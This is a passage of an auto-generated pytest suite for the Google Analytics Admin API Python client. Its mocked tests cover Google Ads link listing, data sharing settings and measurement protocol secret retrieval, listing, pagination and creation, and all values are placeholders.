analytics_admin.ListGoogleAdsLinksResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_google_ads_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_google_ads_links_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.list_google_ads_links( analytics_admin.ListGoogleAdsLinksRequest(), parent="parent_value", ) def test_list_google_ads_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_google_ads_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.GoogleAdsLink) for i in results) def test_list_google_ads_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) pages = list(client.list_google_ads_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_google_ads_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) async_pager = await client.list_google_ads_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.GoogleAdsLink) for i in responses) @pytest.mark.asyncio async def test_list_google_ads_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_google_ads_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], next_page_token="abc", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[], next_page_token="def", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[resources.GoogleAdsLink(),], next_page_token="ghi", ), analytics_admin.ListGoogleAdsLinksResponse( google_ads_links=[ resources.GoogleAdsLink(), resources.GoogleAdsLink(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_google_ads_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_data_sharing_settings( transport: str = "grpc", request_type=analytics_admin.GetDataSharingSettingsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataSharingSettings( name="name_value", sharing_with_google_support_enabled=True, sharing_with_google_assigned_sales_enabled=True, sharing_with_google_any_sales_enabled=True, sharing_with_google_products_enabled=True, sharing_with_others_enabled=True, ) response = client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataSharingSettingsRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.DataSharingSettings) assert response.name == "name_value" assert response.sharing_with_google_support_enabled is True assert response.sharing_with_google_assigned_sales_enabled is True assert response.sharing_with_google_any_sales_enabled is True assert response.sharing_with_google_products_enabled is True assert response.sharing_with_others_enabled is True def test_get_data_sharing_settings_from_dict(): test_get_data_sharing_settings(request_type=dict) def test_get_data_sharing_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: client.get_data_sharing_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataSharingSettingsRequest() @pytest.mark.asyncio async def test_get_data_sharing_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetDataSharingSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataSharingSettings( name="name_value", sharing_with_google_support_enabled=True, sharing_with_google_assigned_sales_enabled=True, sharing_with_google_any_sales_enabled=True, sharing_with_google_products_enabled=True, sharing_with_others_enabled=True, ) ) response = await client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataSharingSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataSharingSettings) assert response.name == "name_value" assert response.sharing_with_google_support_enabled is True assert response.sharing_with_google_assigned_sales_enabled is True assert response.sharing_with_google_any_sales_enabled is True assert response.sharing_with_google_products_enabled is True assert response.sharing_with_others_enabled is True @pytest.mark.asyncio async def test_get_data_sharing_settings_async_from_dict(): await test_get_data_sharing_settings_async(request_type=dict) def test_get_data_sharing_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDataSharingSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: call.return_value = resources.DataSharingSettings() client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_data_sharing_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDataSharingSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataSharingSettings() ) await client.get_data_sharing_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_data_sharing_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataSharingSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_data_sharing_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_data_sharing_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_data_sharing_settings( analytics_admin.GetDataSharingSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_data_sharing_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_sharing_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataSharingSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataSharingSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_data_sharing_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_data_sharing_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.get_data_sharing_settings( analytics_admin.GetDataSharingSettingsRequest(), name="name_value", ) def test_get_measurement_protocol_secret( transport: str = "grpc", request_type=analytics_admin.GetMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) response = client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" def test_get_measurement_protocol_secret_from_dict(): test_get_measurement_protocol_secret(request_type=dict) def test_get_measurement_protocol_secret_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: client.get_measurement_protocol_secret() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetMeasurementProtocolSecretRequest() @pytest.mark.asyncio async def test_get_measurement_protocol_secret_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) ) response = await client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" @pytest.mark.asyncio async def test_get_measurement_protocol_secret_async_from_dict(): await test_get_measurement_protocol_secret_async(request_type=dict) def test_get_measurement_protocol_secret_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetMeasurementProtocolSecretRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: call.return_value = resources.MeasurementProtocolSecret() client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_measurement_protocol_secret_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetMeasurementProtocolSecretRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) await client.get_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_measurement_protocol_secret_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_measurement_protocol_secret(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_measurement_protocol_secret_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_measurement_protocol_secret( analytics_admin.GetMeasurementProtocolSecretRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_measurement_protocol_secret_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_measurement_protocol_secret(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_measurement_protocol_secret_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_measurement_protocol_secret( analytics_admin.GetMeasurementProtocolSecretRequest(), name="name_value", ) def test_list_measurement_protocol_secrets( transport: str = "grpc", request_type=analytics_admin.ListMeasurementProtocolSecretsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse( next_page_token="next_page_token_value", ) response = client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListMeasurementProtocolSecretsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListMeasurementProtocolSecretsPager) assert response.next_page_token == "next_page_token_value" def test_list_measurement_protocol_secrets_from_dict(): test_list_measurement_protocol_secrets(request_type=dict) def test_list_measurement_protocol_secrets_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: client.list_measurement_protocol_secrets() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListMeasurementProtocolSecretsRequest() @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListMeasurementProtocolSecretsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListMeasurementProtocolSecretsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListMeasurementProtocolSecretsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListMeasurementProtocolSecretsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_async_from_dict(): await test_list_measurement_protocol_secrets_async(request_type=dict) def test_list_measurement_protocol_secrets_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListMeasurementProtocolSecretsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse() client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListMeasurementProtocolSecretsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListMeasurementProtocolSecretsResponse() ) await client.list_measurement_protocol_secrets(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_measurement_protocol_secrets_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_measurement_protocol_secrets(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_measurement_protocol_secrets_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_measurement_protocol_secrets( analytics_admin.ListMeasurementProtocolSecretsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListMeasurementProtocolSecretsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListMeasurementProtocolSecretsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_measurement_protocol_secrets( parent="parent_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_measurement_protocol_secrets_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.list_measurement_protocol_secrets( analytics_admin.ListMeasurementProtocolSecretsRequest(), parent="parent_value", ) def test_list_measurement_protocol_secrets_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], next_page_token="abc", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[], next_page_token="def", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),], next_page_token="ghi", ), analytics_admin.ListMeasurementProtocolSecretsResponse( measurement_protocol_secrets=[ resources.MeasurementProtocolSecret(), resources.MeasurementProtocolSecret(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_measurement_protocol_secrets(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.MeasurementProtocolSecret) for i in results) def test_list_measurement_protocol_secrets_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_measurement_protocol_secrets), "__call__" ) as call: # Set the response to a series of pages. 
        call.side_effect = (
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[], next_page_token="def",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),],
                next_page_token="ghi",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                ],
            ),
            RuntimeError,
        )
        pages = list(client.list_measurement_protocol_secrets(request={}).pages)
        # Each raw page surfaces the token used to fetch the *next* page;
        # the last mocked page has no token, hence "".
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


@pytest.mark.asyncio
async def test_list_measurement_protocol_secrets_async_pager():
    # NOTE(review): AnonymousCredentials is passed uninstantiated (no
    # parentheses) in the pager tests, unlike the other tests — presumably a
    # generator artifact; confirm it is accepted by the client constructor.
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_measurement_protocol_secrets),
        "__call__",
        new_callable=mock.AsyncMock,
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[], next_page_token="def",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),],
                next_page_token="ghi",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                ],
            ),
            RuntimeError,
        )
        async_pager = await client.list_measurement_protocol_secrets(request={},)
        assert async_pager.next_page_token == "abc"
        responses = []
        async for response in async_pager:
            responses.append(response)

        # 3 + 0 + 1 + 2 secrets across the four mocked pages.
        assert len(responses) == 6
        assert all(
            isinstance(i, resources.MeasurementProtocolSecret) for i in responses
        )


@pytest.mark.asyncio
async def test_list_measurement_protocol_secrets_async_pages():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_measurement_protocol_secrets),
        "__call__",
        new_callable=mock.AsyncMock,
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[], next_page_token="def",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[resources.MeasurementProtocolSecret(),],
                next_page_token="ghi",
            ),
            analytics_admin.ListMeasurementProtocolSecretsResponse(
                measurement_protocol_secrets=[
                    resources.MeasurementProtocolSecret(),
                    resources.MeasurementProtocolSecret(),
                ],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (
            await client.list_measurement_protocol_secrets(request={})
        ).pages:
            pages.append(page_)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


def test_create_measurement_protocol_secret(
    transport: str = "grpc",
    request_type=analytics_admin.CreateMeasurementProtocolSecretRequest,
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.MeasurementProtocolSecret(
            name="name_value",
            display_name="display_name_value",
            secret_value="secret_value_value",
        )
        response = client.create_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateMeasurementProtocolSecretRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.MeasurementProtocolSecret)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.secret_value == "secret_value_value"


def test_create_measurement_protocol_secret_from_dict():
    test_create_measurement_protocol_secret(request_type=dict)


